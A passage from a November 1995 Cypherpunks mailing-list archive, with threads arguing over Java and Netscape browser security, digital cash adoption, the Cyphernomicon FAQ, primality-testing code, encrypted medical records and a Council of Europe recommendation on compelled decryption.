<199511162113.QAA08492@universe.digex.net> Message-ID: On Thu, 16 Nov 1995, Scott Brickner wrote: > > You'd need a program which not only *accepted* the additional parameter, > but also *needed* the second parameter. I confess I have some difficulty > thinking of one. 
It's not too hard to think of a compression scheme that needs extra information to be passed from client to server; the obvious example is some sort of dictionary compression with external dictionaries (can be very effective for short messages where LZW etc never get a chance to get going). Another, more likely case, is where the object could have been compressed by several schemes, and a scheme ID is needed to determine which algorithm to use. The real issue would appear to be intent, though. If it's obvious that the real intention for the hook is to allow encryption to be added, the State department can jump on it. From rmartin at aw.sgi.com Thu Nov 16 18:56:01 1995 From: rmartin at aw.sgi.com (Richard Martin) Date: Fri, 17 Nov 1995 10:56:01 +0800 Subject: Java & Netscape security [NOISE] In-Reply-To: <9511170006.AA17075@all.net> Message-ID: <9511162021.ZM15853@glacius.alias.com> -----BEGIN PGP SIGNED MESSAGE----- We see enough press releases around here that we can recognise pronouncements from the mouth of a computer company and those from individuals who happen to work for a company. On Nov 16, 7:06pm, Dr. Frederick B. Cohen wrote: > So your claim is that Unix is perfectly secure for networking, > because without inetd, sendmail, ident daemon, HTTP daemons, syslogd, > and all those other add-on software pieces, if your users act perfectly > and nobody ever makes a mistake, you are safe from known attacks. Nope. Claim is roughly along the lines of, unix is incredibly insecure for networking, because of inetd, sendmail, ident, httpd ... but *if* there's a bug in sendmail, the trouble is not with the poor sod who put file access into the kernel, and definitely not with the person who wrote pine--even though pine calls sendmail. > [summary of rest: postscript bad] As you finally concluded, the problem is the web browser. I concede that a web browser is a security hole by its very nature in that it makes it a lot easier for anyone to grab anything from anywhere.
(This is also why web browsers would be unpopular with censors, if censors thought they could get anywhere by arguing against web browsers instead of sites.) Since you've now stated that the web browser is wrong and evil and bad, perhaps it's time you explained your fix for the web browser. The millions of users, even if they *aren't* the problem, even if they *are* blameless for blindly accepting anything anyone sends them, even if they are faultless to ignore any notes on security or care which come with web browsers--despite all of this--will still want something like a web browser. Your argument seems to be running to "users are stupid", but it's the developer's fault that users are stupid, and the developer should protect the user in all cases from their own stupidity. People shouldn't make web browsers, because web browsers, in untrained hands, can damage computers. People shouldn't make guns, because guns, in untrained hands, can damage computers. I would say that connectivity is risk, and that those who want connectivity must weigh those risks. I think most people weigh the risks of Netscape et al. and say, "the benefits offset the risks." richard [web browsers don't destroy hard drives, numbskulls with mice do] - -- Richard Martin I DON'T SPEAK FOR ALIAS|WAVEFRONT Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From tcmay at got.net Thu Nov 16 19:00:35 1995 From: tcmay at got.net (Timothy C.
May) Date: Fri, 17 Nov 1995 11:00:35 +0800 Subject: e$: Mandarins, Lifers, and Talents Message-ID: Lots of different issues here.... At 9:02 PM 11/16/95, Robert Hettinga wrote: >Reputation... It has been ever thus, for those of you who've been around >here since I showed up a year ago last April. I just can't seem to color >inside the lines, as far as Dr. May is concerned. Unfair, unfair! I don't plan to dig up old posts where I said good things about Bob's posts, but I know I have. His style differs from mine, of course, but I usually avoid critiquing mere styles. On to some other points in Bob's post: (quoting me) >>2. I wish Mark Twain Bank well, but the success of the kinds of digital >>cash we hope to see will not likely hinge on the success of one particular >>operations, such as MTB. > >Nope. But if people completely ignored the Wright Brothers, would Curtiss >have entered the market? (An interesting example, as the Wrights sued >Curtiss for patent infringement and lost, I think.) "Flight" is a very interesting example to consider. Flight happened for a lot of reasons, including technological feasibility, relatively low entry costs, willingness of customers to pay for faster travel, etc. It really did not happen because of cheerleaders. This is a recurring belief of mine, notably in my occasional interactions with the nanotech community, as a few members of this list can attest to. The "Rah, Rah"s--no pun intended--play a minor role in adoption of new products and technologies. >>I have more interesting things to do, personally, than to be a pioneer so I >>can then have nothing to sell, and little to buy....when "interesting >>markets" start to appear, I'll look at it again. > >This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we >could have some ham and eggs, if we had some eggs." or, "If we lived here, >we'd be home now." Feh. You can do better than that. I've seen you do it. One argument I am never persuaded by is the hackerish "Feh."
(Does anybody but hackers use this strange word?) In any case, I'm not interested in "doing better than that." My support for Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic Money, or E-Purse, or Digibux, or whatever, well, I'm not a merchant. Just as one could study flight, to use Bob's example, without operating a passenger service or a flying school, so one can be interested in digital cash without "opening an account." >But, to answer your nonexistent point, yes, people *are* starting to sell >things on the net. We know that the best way to do that in the long run is ... Ah, but I never claimed otherwise (perhaps this is what you mean by "your nonexistent point"). My point was only that digital cash will happen mostly when it fills a need, or is accepted by customers, not by cheerleading and by urging people on this list to be pioneers. (And actually I have nothing against urging people to be pioneers. Or cheerleading. It doesn't consume much list bandwidth and it may actually help get someone started. Which is why I didn't call for an end to cheerleading and pioneer-recruiting.) The theories about mandarins, lifers, and talents I'll discuss at another time, maybe. All I'll say is that I think it's too simple a categorization. Maybe it's a Boston viewpoint. The folks I've worked with over the years bear almost no resemblance to any of these categories. In any case, people will start using digital cash if and when it fulfills some need, or some need they never knew they had, gets stimulated. On a personal note--which is weird, since 1000 or more people may be reading this message, though most probably haven't read this far--I think it best not to get too emotionally attached to some particular outcome in the introduction of a new technology. Most product and technology successes are essentially unpredictable, and many things thought to be sure things are failures.
I've seen many "prophets" wailing to the world that their visions _deserve_ success. The technologies which hit the right chord rarely need, or benefit from, the "evangelists" and "cheerleaders." The Macintosh did not need Guy Kawasaki or any of the other so-called evangelists to succeed. The microprocessor did not need evangelists. The airplane did not. The VCR did not. The cellular phone did not. In fact, I can't think of an example of a major technology that _did_ depend critically on cheerleaders and evangelists. Some examples may exist, but they seem to be rare. And I can think immediately of several technologies that had active proselytizers--Ted Nelson, Doug Engelbart, Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space enthusiasts--but in which progress has been stalled or proceeded along different paths for different reasons. This is a very interesting area for me, and I used to write extensively about it. Nick Szabo and I had several debates about this, a couple of years ago. However, no time now to discuss the full implications here. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Nov 16 19:11:59 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 17 Nov 1995 11:11:59 +0800 Subject: The Great FAQ Hunt Message-ID: I answer questions about my megabyte-long "Cyphernomicon" FAQ every few months, so I guess it's that time again.
At 11:19 PM 11/16/95, Cassiel wrote: >Several fellow newbies have written me asking to share >the sources I received re: where to get the uncorrupted >Cypherpunk FAQ (Cyphernomicon). You can get it uncompressed-- >along with a lot of other cool stuff, like the Applied >Crypto book--at Pat Farrell's Web Site (thanks, Pat!) > >http://www.isse.gmu.edu/~pfarrell/crypto.html > >However, when I tried to summon up this 1.2 MB tome with >Netscape, my computer choked. Changing the cache settings >didn't seem to help, so I wound up downloading it via FTP >from > >ftp.netcom.com /pub/tc/tcmay > >where you can also get your hands on the shorter MFAQ (Most >Frequently Asked Questions). My "Cyphernomicon" FAQ, and various shorter and compressed versions, are available, actually, in several places. The site I tell people about most often is Jonathan Rochkind's excellent HTML version at the URL: http://www.oberlin.edu/~brchkind/cyphernomicon/ I recommend that people use their browsers to read it at this URL. To those who want to download the whole thing and print it out, I have one question: "Are you on drugs?" (I have gotten complaints from people who tried to print it out and gave up after 200 pages, somehow blaming me for it being too long. Use computerized search tools!) Searching for "Cyphernomicon" with InfoSeek, Excite, Lycos, or other search tools will show numerous places it may be found. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." 
From cjs at netcom.com Thu Nov 16 19:25:40 1995 From: cjs at netcom.com (cjs) Date: Fri, 17 Nov 1995 11:25:40 +0800 Subject: Java & Netscape security (reply to misc. postings) In-Reply-To: <9511162108.AA08466@all.net> Message-ID: <199511170156.RAA17754@netcom20.netcom.com> I keep telling you people.. if you keep giving Fred the attention, he is never going to go away. It's blindingly obvious that he doesn't know his ass from a hole in the ground, but if you keep telling him that, it's just going to encourage him to post more, post more frequently, and make a bigger fool of himself than he already has. Just ignore everything he says. Make a proc-mail script to send his mails to /dev/null or send them through the text-to-hick filter. But whatever you do, do *not* send him money, do *not* feed him, and *never* *ever* no matter how much he begs, no matter how much he pleads, *NEVER* reply to this man's messages. We need one of those little posters like the "Do not take checks from this man" ones in the grocery store. Christopher > > 3. Postscript considered dangerous: (insert-smiley) > > > > As for the question of someone invoking a postscript interpreter via a > > browser and thus opening up their system to some rogue postscript > > file: I think it would be great if either of these two things were to > > magically happen: > > > > 1) people would stop putting postscript docs on web pages > > because it's the wrong technology for WWW - it wastes > > bandwidth - it's hard to view & hence often ugly - everyone > > just prints it out anyway and then complains because there > > is no one "standard" implementation of postscript printing > > worldwide and there are dozens of minor problems > > > > 2) someone could implement a secure postscript previewer > > (whatever that means!) > > > > I doubt either of those two things will happen.
The average Jo on the > > internet needs to understand that when s/he downloads binary files > > over the internet and run them from insecure programs on their local > > computer, well, s/he runs some risk. This risk might be tiny, but > > it's impossible to quantify loss. If I lose a poem that I'm writing, > > to me that's priceless, so I do not intend to imply that loss of data > > isn't tragic for the person who loses it. If you have data you can't > > bear to lose, be sure to practice safe computing. Perform backups > > regularly, and use judgement about which interpreters and executable > > programs you allow to run on your PC. > > > > Marianne > > It seems clear from this that Netscape, or at least Marianne who seems > to speak for Netscape, doesn't understand the protection issues that my > clients face. I will nevertheless forward this official Netscape line > to them so they can better understand why I tell them it is insecure. > > -- > -> See: Info-Sec Heaven at URL http://all.net/ > Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From rmartin at aw.sgi.com Thu Nov 16 19:40:03 1995 From: rmartin at aw.sgi.com (Richard Martin) Date: Fri, 17 Nov 1995 11:40:03 +0800 Subject: Java & Netscape security [NOISE] In-Reply-To: <9511162108.AA08466@all.net> Message-ID: <9511161831.ZM14572@glacius.alias.com> -----BEGIN PGP SIGNED MESSAGE----- On Nov 16, 4:08pm, Dr. Frederick B. Cohen wrote: > Subject: Re: Java & Netscape security (reply to misc. postings) > > 3. Postscript considered dangerous: (insert-smiley) > It seems clear from this that Netscape, or at least Marianne who seems > to speak for Netscape, doesn't understand the protection issues that my > clients face. I will nevertheless forward this official Netscape line > to them so they can better understand why I tell them it is insecure. Alright. I've lurked on this one-man issue long enough. The latest attack was severely lacking in clue. Had Dr.
Fred bothered to read EVEN the .sig file, he *might* have noticed that Marianne works for SUN [three letters], not Netscape [eight letters]. He *might* have noticed that she was writing from her personal account. Perhaps Dr. Fred fails to realise that some people *aren't* speaking for their entire company every time they write e-mail. [see fc.all.net-- i always enjoy pronouncing that nearly phonetically] Dr. Fred will forward this `official Netscape line' to Netscape, probably with the similar lack of proper attribution or recognition of context. We can hope that the receiving end of Netscape possesses at least those few cluons more which are required to realise how far off *anything* Dr. Fred is now writing. To have some slight cpunks relevance, I will weigh in on the side of `It's not X's responsibility to ensure that Y's software isn't broken.' {for all X, Y in {software developers}} Why? For the same reason that I'm not generally held accountable for, say, Gary Jeffer's opinions or Tim May's: because I don't have any control over them. richard - -- Richard Martin I DON'T SPEAK FOR ALIAS|WAVEFRONT Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From rthomas at pamd.cig.mot.com Thu Nov 16 19:40:55 1995 From: rthomas at pamd.cig.mot.com (Robert Owen Thomas) Date: Fri, 17 Nov 1995 11:40:55 +0800 Subject: Java & Netscape security [NOISE] In-Reply-To: <9511170006.AA17075@all.net> Message-ID: <9511162017.ZM29217@pamd.cig.mot.com> *sigh* yet another rambling non-sequitur from Dr. Fred.
time to re-activate my kill-file... -- o Robert Owen Thomas: Corvette pilot. Cymro ydw i. User scratching post. o o E-mail: Robert.Thomas at pamd.cig.mot.com --or-- robt at Cymru.COM o o Vox: 708.435.7076 Fax: 708.435.7360 o o "When I die, I want to go sleeping like my grandfather... o o Not screaming like the passengers in his car." o From weidai at eskimo.com Thu Nov 16 19:47:12 1995 From: weidai at eskimo.com (Wei Dai) Date: Fri, 17 Nov 1995 11:47:12 +0800 Subject: primality code In-Reply-To: <9511161826.AA10763@asgaard.rocket.com> Message-ID: On Thu, 16 Nov 1995, Philip Nesser wrote: > Can someone point me in the right direction for any archives of code to do > primality testing? I would rather not have to write something from > scratch. You may want to try my Crypto++, which includes, among other things, a bignum package and an implementation of the Rabin-Miller compositeness test. See http://www.eskimo.com/~weidai/cryptlib.html for more information. Wei Dai From adam at lighthouse.homeport.org Thu Nov 16 19:50:08 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 17 Nov 1995 11:50:08 +0800 Subject: MED_vac In-Reply-To: <199511152004.PAA05104@ziggy.tis.com> Message-ID: <199511170243.VAA06078@homeport.org> If you have some personal data that includes your patient number, why not have a card that instead lists your important data? "This patient is diabetic, allergic to amoxicillin, and has Gold Cross insurance." The amount of important data that an ER needs is small. There is small benefit to building a huge infrastructure to get that data carted around. Also, in ERs, the computers are often authorized the same way everything else is: a nurse will tell you to leave if you don't belong there. At Defcon, Bruce Schneier was talking about the value stored in casino chips. It's staggering. It's an alternate cash system, with a huge float, astounding velocity, and very little fraud. Transaction costs are low, clearing is instantaneous.
The comparison is fairly clear. Adam Thomas M. Swiss wrote: | I very much want hospitals to have fast access to my medical data if | my broken and bleeding body should come through their door, even if I am | unconscious and my personal physician cannot be reached. On the other hand, | I don't want anyone to be snooping through them right now. | So, what if my records were available on the net, but encrypted with a | key known to my physician and an escrow agency? (Equivalently, they | could be on that smartcard, but encrypted.) If an emergency occurs, the | hospital fetches my encrypted records from my physician's server, then | sends a message (signed with the hospital's key) to Keys R Us, the escrow | agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the | key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix, | Inc., insurance card lists my physician's server, the escrow agency, and my -- "It is seldom that liberty of any kind is lost all at once." -Hume From asgaard at sos.sll.se Thu Nov 16 20:00:45 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Fri, 17 Nov 1995 12:00:45 +0800 Subject: COE Recommendation No. R (95) 13 In-Reply-To: <9511160302.AA17272@www18.w3.org> Message-ID: On Wed, 15 Nov 1995, Phillip M. Hallam-Baker wrote: > I think the majority of the text is well thought out and very much in > line with what we would want. How about this: ________________________________________________________________________ 9. Subject to legal privileges or protection, most legal systems permit investigating authorities to order persons to hand over objects under their control that are required to serve as evidence. In a parallel fashion, provisions should be made for the power to order persons to submit any specified data under their control in a computer system in the form required by the investigating authority. ________________________________________________________________________ Is this 'what we would want'?
It clearly means that one can be ordered to reveal the password to encrypted data and punished by law if one refuses. Suppose they suspect you of being a child pornographer and get a court order to search your encrypted system. You know you are innocent. Is it acceptable to put you in jail for not giving them access to your encrypted, very personal diary (in which you describe in detail your sexual encounters with the wife of the Chief of Police)? And how about this: _______________________________________________________________________ 14. Measures should be considered to minimise the negative effects of the use of cryptography on the investigation of criminal offenses, without affecting its legitimate use more than is strictly necessary. _______________________________________________________________________ Is this really just a toothless statement to give to the French? Couldn't it as easily be interpreted as not wanting to go into details yet (since no real system is available) but stating that some form of GAK is on the agenda? Surely, law enforcement bureaucrats would not consider GAK to affect the 'legitimate use' of cryptography 'more than is strictly necessary'. Mats From sameer at c2.org Thu Nov 16 20:02:42 1995 From: sameer at c2.org (sameer) Date: Fri, 17 Nov 1995 12:02:42 +0800 Subject: e$: Come aaaannnndddd Get it! In-Reply-To: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu> Message-ID: <199511162356.PAA28194@infinity.c2.org> > I will as soon as someone comes up with a _fully_ private digital > cash system and starts using it for something. As I understand it, Chaum's > ecash system is not one (i.e., non-privacy to the sender and of amounts to the > bank). If I'm incorrect, please tell me and I'll set up an account with MTB > immediately (if there's a text-based interface). ecash provides full payor anonymity. Payee anonymity is currently not possible, but that is being worked on. 
If you used ecash to pay for a c2.org account, neither I nor the bank would be able to trace the payment into the c2.org account to an actual account at mark twain bank. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From schampeo at imonics.com Thu Nov 16 20:14:24 1995 From: schampeo at imonics.com (Steve Champeon working from home) Date: Fri, 17 Nov 1995 12:14:24 +0800 Subject: Java & Netscape security [NOISE] Message-ID: ! I'm so tired of listening to this no-researching, no-paying-attention, out-to-make-money freak I just can't stand it. Consider Mr. fc at all.net hereby removed from my mailbox by virtue of the autofiltering capability of my lovely mailreader. Fred: *RTFWP* and stop complaining about things you know nothing about. Feh. Steve -- Steven Champeon (919) 469-7833 Technical Lead, schampeo at imonics.com Imonics Web Services webmaster at imonics.com From szabo at netcom.com Thu Nov 16 20:51:37 1995 From: szabo at netcom.com (Nick Szabo) Date: Fri, 17 Nov 1995 12:51:37 +0800 Subject: Security via Sounding Impressive Message-ID: <199511170351.TAA26249@netcom5.netcom.com> I've noticed an interesting pattern in how security mechanisms are named. On the one hand, we have some security features with very impressive sounding names: Certification *Authority* *Authorization* *Trusted* Server *Master* Key etc. These words fill most people (many on this list are exceptions) with awe and good will towards the feature so named. They also make good channel markers, pointing out the _insecure_ parts of the system. The effect is to cover up the lack or inadequacy of a mechanism with invocations that put your brain to sleep. This is quite lucrative for marketing purposes, but it works on many designers of security features as well!
On the other hand, when we isolate the actual mechanisms of a system are in fact mathematically secure, we get names like: Encryption Blinding Message Digest Mix Capability These are just plain, boring words, with no connotation that we should trust them like we trust our big brother. They just work. Nick Szabo szabo at netcom.com Internet Commerce & Security consulting -- e-mail for details From bdolan at use.usit.net Thu Nov 16 20:55:28 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Fri, 17 Nov 1995 12:55:28 +0800 Subject: Java & Netscape security [NOISE] In-Reply-To: Message-ID: From fc at all.net Thu Nov 16 21:04:14 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 17 Nov 1995 13:04:14 +0800 Subject: Java & Netscape security [NOISE] In-Reply-To: <9511162021.ZM15853@glacius.alias.com> Message-ID: <9511170355.AA28616@all.net> ... > On Nov 16, 7:06pm, Dr. Frederick B. Cohen wrote: > > So your claim is that Unix is perfectly secure for networking, > > because without inetd, sendmail, ident daemon, HTTP daemons, syslogd, > > and all those other add-on software pieces, if your users act perfectly > > and nobody ever makes a mistake, you are safe from known attacks. > > Nope. Claim is roughly along the lines of, unix is incredibly insecure > for networking, because of inetd, sendmail, ident, httpd ... but *if* > there's a bug in sendmail, the trouble is not with the poor sod who > put file access into the kernel, and definitely not with the person > who wrote pine--even though pine calls sendmail. But of course, the sendmail problems are all related to other problems with Unix, and the common thread to all of the sendmail attacks is Unix, so many people blame Unix, not sendmail (although I think there is enough blame to go around). > > [summary of rest: postscript bad] > > As you finally concluded, the problem is the web browser.
I concede that > a web browser is a security hole by its very nature in that it makes it > a lot easier for anyone to grab anything from anywhere. (This is also > why web browsers would be unpopular with censors, if censors thought they > could get anywhere by arguing against web browsers instead of sites.) Grabbing anything from anywhere isn't the problem. The problem is how you interpret it. Information only has meaning in that it is interpreted. > Since you've now stated that the web browser is wrong and evil and bad, > perhaps it's time you explained your fix for the web browser. I didn't say wrong, evil, or bad. I only said insecure. My complaints against Netscape and Sun are not that their Web browsers are insecure - it is that they are selling these browsers based on security. The general public, and most of the users in the world, don't perceive the difference between SSL and Java and secure - they hear that SSL makes them safe, that Java makes them safe, and they believe it. > The > millions of users, even if they *aren't* the problem, even if they *are* > blameless for blindly accepting anything anyone sends them, even if they > are faultless to ignore any notes on security or care which come with web > browsers--despite all of this--will still want something like a web browser. It's like selling me a gun and calling it safe because it has a safety on it. The safety doesn't make a gun safe, it only makes it safer against particular classes of problems. Gun sellers don't call guns safe, and neither should sellers of Web browsers. > Your argument seems to be running to "users are stupid", but it's the > developer's fault that users are stupid, and the developer should protect > the user in all cases from their own stupidity. If the user claims to provide safety, that should apply to the least knowledgeable user, not only to the most knowledgeable. Almost any system can be operated securely by the most knowledgeable user.
That's not the market Netscape and Java are aimed toward. > People shouldn't make web browsers, because web browsers, in untrained hands, > can damage computers. > People shouldn't make guns, because guns, in untrained hands, can damage > computers. I said neither. I said that people shouldn't claim that Web browsers are safe just because they have some safety features. The same applies to guns. > I would say that connectivity is risk, and that those who want connectivity > must weigh those risks. I think most people weigh the risks of Netscape > et al. and say, "the benefits offset the risks." If that were true, I wouldn't have a real problem with it, but it's not true. Most people don't understand the risks. In fact, even most people on this list apparently don't understand the risks. People see benefits because they pop out at them on the screen. People only see risks when they get burned by them and are aware of it. I think that very few people weigh the risks of Netscape/HotJava because almost nobody is even aware of them. Of the people that do weigh the risks, many of them listen to people who say that Netscape/Java is secure. Very few of them pay real attention to the details of what is actually claimed about security. Then we have the people at Netscape/Sun and many of the people on this list who keep telling people that these products are secure. We hear again and again that they should blame any negative results of using these products on their users and the copy of ghostscript or postscript they imported to make their browser read the files they want to read. If companies claim a secure browser, it should be secure regardless of the typical errors and omissions made by the least sophisticated user. > [web browsers don't destroy hard drives, numbskulls with mice do] Current Web browsers are unsafe - so are most current users. Bullets kill people, but for the most part, people pull the triggers, and a gun is the enabling technology.
When you hand millions of people who know nothing about guns with loaded oozies and put them into crowds, you can hardly claim no responsibility when they start shooting each other. -- -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From frantz at netcom.com Thu Nov 16 21:06:55 1995 From: frantz at netcom.com (Bill Frantz) Date: Fri, 17 Nov 1995 13:06:55 +0800 Subject: Java & Netscape security (reply to misc. postings) Message-ID: <199511170439.UAA19926@netcom17.netcom.com> After reading http://java.sun.com/1.0alpha3/doc/security/security.html my (possibly faulty) understanding of Java security is that it will not allow an applet to speak to IP addresses other than the one it was loaded from. I have a question: Doesn't restriction this prevent an applet from checking some ecash it has just received for validity with a bank computer? Thanks - Bill ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From rah at shipwright.com Thu Nov 16 21:11:28 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 17 Nov 1995 13:11:28 +0800 Subject: e$: Mandarins, Lifers, and Talents Message-ID: >It really did not happen because of cheerleaders. This is a recurring >belief of mine, notably in my occasional interactions with the nanotech >community, as a few members of this list can attest to. The "Rah, Rah"s--no >pun intended--play a minor role in adoption of new products and >technologies. Tim, you can't tell me that there weren't people who were just plain fired up about the prospects for any really serious technology. Where are you living, the Gernsbeck Continuum? Tim, those "cheerleaders" are the ones who either get fired up to do something themselves, or if they can't, they get people either fired up to buy stuff, or fired up to build stuff. Howard Hughes was one. 
Hell, the Wright brothers were. So are you, Tim, only your passion is strong crypto and cryptoanarchy. Mine is this geodesic market stuff... >One argument I am never persuaded by is the hackerish "Feh." (Does anybody >but hackers use this strange word?) Ah. Well, Tim, "Feh" is yiddish, actually. Just like "hacker" comes from electric trains. If you don't believe me on *that* one, ask Mr. Levy, who knows all about the MIT Model Railroading Club... >In any case, I'm not interested in "doing better than that." My support for >Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic >Money, or E-Purse, of Digibux, or whatever, well, I'm not a merchant. Just >as one could study flight, to use Bob's example, without operating a >passenger service or a flying school, so one can be interested in digital >cash without "opening an account." Right on, Tim. Just don't rain on my parade, or anyone else who's trying to make something happen, for that matter. >Ah, but I never claimed otherwise (perhaps this is what you mean by "your >nonexistant point"). My point was only that digital cash will happen mostly >when it fills a need, or is accepted by customers, not by cheerleading and >by urging people on this list to be pioneers. Cart before the horse, Tim. Most of the new people (say, for 2 years at least) on this list *are* pioneers. I've got 600 people over on www-buyinfo who are there primarily because 90% (!) of the traffic on it is my e$-filtered cross-posts from cypherpunks, and I don't know how many are over here because they like their whiskey neat. Those people are so fired up, they will find a need, or *create* one, if they have to. >The theories about mandarins, lifers, and talents I'll discuss at another >time, maybe. All I'll say is that I think it's too simple a categorization. >Maybe it's a Boston viewpoint. Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces, Corpus Christi, El Paso, Anchorage, St. 
Louis, Mid-MO, Chicago, and yes, Boston. Never knew I was one until you told me... >The folks I've worked with over the years >bear almost no resemblance to any of these categories. Typical Mandarin response. ;-). (just pulling your leg, Tim. Put the Glock *down*...) >In any case, people >will start using digital cash if and when it fulfills some need, or some >need they never knew they had, gets stimulated. Agreed. > >On a personal note--which is weird, since 1000 or more people may be >reading this message, though most probably haven't read this far--I think >it best not to get too emotionally attached to some particular outcome in >the introduction of a new technology. I bet they are, but I'm not attached to Mark Twain or even Digicash per se. It just seems to me, that if you want to get involved in this flying stuff, here's a plane that flies, even if its elevators are stuck on the front. Learn to fly now, and be able to fly the new stuff as it becomes available. If you want to fly, that is. Some people then couldn't help it. They *had* to do it. That's what's happening here, Tim. >I've seen many "prophets" wailing to the world that their >visions _deserve_ success. Not here Tim. I believe you might be projecting, or something. I just want to sell stuff for cash on the net. Then, I want to surfact the financial markets into little tiny pieces... >The technologies which hit the right chord rarely need, or benefit from, >the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or >any of the other so-called evangelists to succeed. The microprocessor did >not evangelists. The airplane did not. The VCR did not. The cellular phone >did not. I don't believe that for a minute, and on reflection, you probably don't either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake. Think about, oh, the Sony guy, whatever his name is, Morita. The people who built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed. 
What about the *entrepreneur's* reality distortion field. I bet you've seen more than a few, and probably more than a few who were right, or you wouldn't be thrashing your Mac on the net and clipping coupons... >And I can think immediately of several >technologies that had active proselytizers--Ted Nelson, Doug Engelbart, >Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space ^^^^^ >enthusiasts--but in which progress has been stalled or proceeded along ^^^^^^^^^^^^ >different paths for different reasons. I resemble that remark. Sure, Tim some of them didn't make it. But for every one of those (strange you should mention Jobs, right after I mention the reality distortion field, and don't count him out yet, rumor has it Ellison wants him to run Apple when Oracle buys it, god help us all), there are others who did exactly that. Von Braun, or Porsche, or, hell, all I can think of are germans, uh, okay, Bill Gates. >This is a very interesting area for me, and I used to write extensively >about it. Nick Szabo and I had several debates about this, a couple of >years ago. However, no time now to discuss the full implications here. Having been hammered by Nick myself, once or twice, I think I understand this... So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets enthusiastic about all this on my account, and puts up the king-hell, world-beater, financial-cryptography-killer-ap that's cool by me. Otherwise, it's only bandwidth, which I've wasted enough on for this thread. If you want to make the rubble bounce, go for it. Besides, I usually stay in my cage, these days. Which is where I'm going to go and lurk for another month or so... Cheers, Bob Hettinga PS: Feh ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." 
--Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From tcmay at got.net Thu Nov 16 23:06:16 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 17 Nov 1995 15:06:16 +0800 Subject: e$: Come aaaannnndddd Get it! Message-ID: At 5:20 AM 11/17/95, sameer wrote: >> >> 3. The success of BankAmericard (later renamed Visa) came when real >> customers and real shops started to use it, not when early pioneers set >> themselves up as clearinghouses and whatnot. > > I'm sorry, but Community ConneXion is a real shop, with real >customers, selling real services, and we accept ecash. You guys are getting way too sensitive about all this. I'm in favor of real shops selling real things or real services. My point was that there is no compelling need to get people to sign up just for moral support. Lighten up. --Tim Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From stewarts at ix.netcom.com Thu Nov 16 23:23:26 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 17 Nov 1995 15:23:26 +0800 Subject: Mark Twain Bank ecash scripts needed Message-ID: <199511170707.XAA07527@ix3.ix.netcom.com> At 04:25 PM 11/16/95 -0700, Bryce wrote: >I am in the process of setting up a shop using Mark Twain Bank >Ecash. Could someone please forward me the scripts to accept Ecash >(running on SunOS. 
